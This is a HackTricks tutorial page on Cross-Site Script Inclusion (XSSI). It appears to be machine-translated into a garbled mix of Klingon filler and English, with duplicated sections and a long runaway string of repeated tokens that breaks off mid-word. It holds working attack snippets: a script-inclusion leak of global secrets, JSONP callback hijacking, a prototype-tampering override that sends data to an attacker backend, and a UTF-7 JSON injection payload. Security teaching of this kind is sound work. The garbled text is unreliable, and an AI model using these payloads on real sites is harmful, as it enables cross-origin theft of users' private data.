# XSSI (Cross-Site Script Inclusion)

<details>

<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks</strong></a><strong>!</strong> 'oH</summary>

HackTricks vItlhutlh:

* **HackTricks** 'oH **tlhIngan Hol** vItlhutlh 'ej **HackTricks** 'oH **PDF** vItlhutlh [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) vItlhutlh!
* [**PEASS & HackTricks swag**](https://peass.creator-spring.com) vItlhutlh
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) vItlhutlh, **NFTs** [**opensea.io**](https://opensea.io/collection/the-peass-family) vItlhutlh
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) 'ej [**telegram group**](https://t.me/peass) vItlhutlh 'ej **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **HackTricks** 'ej **HackTricks Cloud** github repos vItlhutlh **PRs** jImej.

</details>


## Basic Information

**Cross-Site Script Inclusion (XSSI)** 'oH vulnerability 'e' vItlhutlh `script` tag HTML. 'ach resources, 'oH **Same-Origin Policy (SOP)**, 'ach, scripts vItlhutlh included different domains. vItlhutlh 'oH behavior intended libraries 'ej resources hosted different servers 'ach introduces potential security risk.

### Key Characteristics of **XSSI**:
- **Bypass of SOP**: Scripts vItlhutlh exempt **Same-Origin Policy**, allowing vItlhutlh included across domains.
- **Data Exposure**: 'ach attacker vItlhutlh exploit behavior read data loaded `script` tag.
- **Impact on Dynamic JavaScript/JSONP**: **XSSI** 'oH particularly relevant dynamic JavaScript 'ej **JSON with Padding (JSONP)**. 'ach technologies often use "ambient-authority" information (like cookies) authentication. script request vItlhutlh made different host, credentials (e.g., cookies) automatically included request.
- **Authentication Token Leakage**: 'ach attacker vItlhutlh trick user's browser requesting script server they control, vItlhutlh access sensitive information contained requests.

### Types

1. **Static JavaScript** - 'oH represents conventional form XSSI.
2. **Static JavaScript with Authentication** - 'oH type distinct because authentication vItlhutlh access.
3. **Dynamic JavaScript** - Involves JavaScript dynamically generates content.
4. **Non-JavaScript** - Refers vulnerabilities involve JavaScript directly.

**The following information sumary [https://www.scip.ch/en/?labs.20160414](https://www.scip.ch/en/?labs.20160414)**. vItlhutlh further details.

### Regular XSSI
In this approach, private information embedded within globally accessible JavaScript file. Attackers vItlhutlh identify files using methods file reading, keyword searches, regular expressions. Once located, script containing private information vItlhutlh included malicious content, allowing unauthorized access sensitive data. example exploitation technique shown below:
```html
<script src="https://www.vulnerable-domain.tld/script.js"></script>
<script> alert(JSON.stringify(confidential_keys[0])); </script>
```
### Dynamic-JavaScript-based-XSSI and Authenticated-JavaScript-XSSI
**tlhIngan Hol translation:**

**Dynamic-JavaScript-based-XSSI and Authenticated-JavaScript-XSSI**
**'ej** XSSI attacks **vItlhutlh** confidential information **'e'** dynamically added **script** response **user's request**. Detection **vItlhutlh** performed **sending requests** **cookies** **'ej** comparing **responses**. **'ach** information **Doch** **Doch** indicate **presence** confidential information. **vaj** process **vItlhutlh** automated **tools** **DetectDynamicJS** Burp extension.

**confidential data** **vItlhutlh** stored **global variable**, **exploited** **methods** **Regular XSSI** **vItlhutlh** used. **'ach** confidential data **vItlhutlh** included **JSONP response**, attackers **hijack** callback function **retrieve** information. **vaj** **vItlhutlh** manipulating **global objects** **setting** function **executed** **JSONP response**, **demonstrated** below:
```html
<script>
var angular = function () { return 1; };
angular.callbacks = function () { return 1; };
angular.callbacks._7 = function (leaked) {
alert(JSON.stringify(leaked));
};
</script>
<script src="https://site.tld/p?jsonp=angular.callbacks._7" type="text/javascript"></script>
```

```html
<script>
leak = function (leaked) {
alert(JSON.stringify(leaked));
};
</script>
<script src="https://site.tld/p?jsonp=leak" type="text/javascript"></script>
```
### XSSI (Cross-Site Script Inclusion)

For variables not residing in the global namespace, *prototype tampering* can sometimes be exploited. This technique leverages JavaScript's design, where code interpretation involves traversing the prototype chain to locate the called property. By overriding certain functions, such as `Array`'s `slice`, attackers can access and leak non-global variables:

### XSSI (Cross-Site Script Inclusion)

ghItlhvamDaq *prototype tampering* vItlhutlh. vaj JavaScript vItlhutlh, 'ej vItlhutlhDaq code interpretation involves the prototype chain to locate the called property. 'ej 'ejwI'vam 'ejwI'vam, 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejw
```javascript
Array.prototype.slice = function(){
// leaks ["secret1", "secret2", "secret3"]
sendToAttackerBackend(this);
};
```
### Non-Script-XSSI
Takeshi Terada's research introduces another form of XSSI, where Non-Script files, such as CSV, are leaked cross-origin by being included as sources in a `script` tag. Historical instances of XSSI, such as Jeremiah Grossman’s 2006 attack to read a complete Google address book and Joe Walker’s 2007 JSON data leak, highlight the severity of these threats. Additionally, Gareth Heyes describes an attack variant involving UTF-7 encoded JSON to escape the JSON format and execute scripts, effective in certain browsers:

### Non-Script-XSSI
Takeshi Terada's research introduces another form of XSSI, where Non-Script files, such as CSV, are leaked cross-origin by being included as sources in a `script` tag. Historical instances of XSSI, such as Jeremiah Grossman’s 2006 attack to read a complete Google address book and Joe Walker’s 2007 JSON data leak, highlight the severity of these threats. Additionally, Gareth Heyes describes an attack variant involving UTF-7 encoded JSON to escape the JSON format and execute scripts, effective in certain browsers:
```javascript
[{'friend':'luke','email':'+ACcAfQBdADsAYQBsAGUAcgB0ACgAJwBNAGEAeQAgAHQAaABlACAAZgBvAHIAYwBlACAAYgBlACAAdwBpAHQAaAAgAHkAbwB1ACcAKQA7AFsAewAnAGoAbwBiACcAOgAnAGQAbwBuAGU-'}]
```

```html
<script src="http://site.tld/json-utf7.json" type="text/javascript" charset="UTF-7"></script>
```
<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>